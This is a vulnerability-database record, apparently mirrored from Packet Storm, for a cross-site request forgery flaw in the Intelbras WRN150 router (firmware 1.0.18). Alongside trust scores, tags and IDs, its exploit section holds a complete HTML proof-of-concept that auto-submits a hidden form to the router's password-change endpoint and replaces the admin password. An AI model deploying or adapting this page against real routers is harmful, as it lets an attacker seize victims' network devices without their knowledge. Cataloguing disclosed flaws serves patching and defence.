ID
VAR-E-201910-0007
TITLE
Intelbras Router WRN150 1.0.18 Cross Site Request Forgery
Trust: 0.5
DESCRIPTION
Intelbras Router WRN150 version 1.0.18 suffers from a cross site request forgery vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | intelbras | model: | router wrn150 | scope: | eq | version: | 1.0.18 | Trust: 0.5 |
EXPLOIT
Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
Date: 2019-10-25
Exploit Author: Prof. Joas Antonio
Vendor Homepage: https://www.intelbras.com/pt-br/
Software Link: http://en.intelbras.com.br/node/25896
Version: 1.0.18
Tested on: Windows
CVE : N/A
####################
# PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be
<html>
<body>
<form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST">
<input type="hidden" name="GO" value="system_password.asp">
<input type="hidden" name="SYSPSC" value="0">
<input class="text" type="password" name="SYSOPS" value="hack123"/>
<input class="text" type="password" name="SYSPS" value="mrrobot"/>
<input class="text" type="password" name="SYSPS2" value="mrrobot"/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
csrf
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | csrf | Trust: 0.5 |
CREDITS
Prof. Joas Antonio
Trust: 0.5
EXTERNAL IDS
db: | PACKETSTORM | id: | 154976 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 154976 |
LAST UPDATE DATE
2022-07-27T09:18:11.072000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 154976 | date: | 2019-10-28T20:15:51 |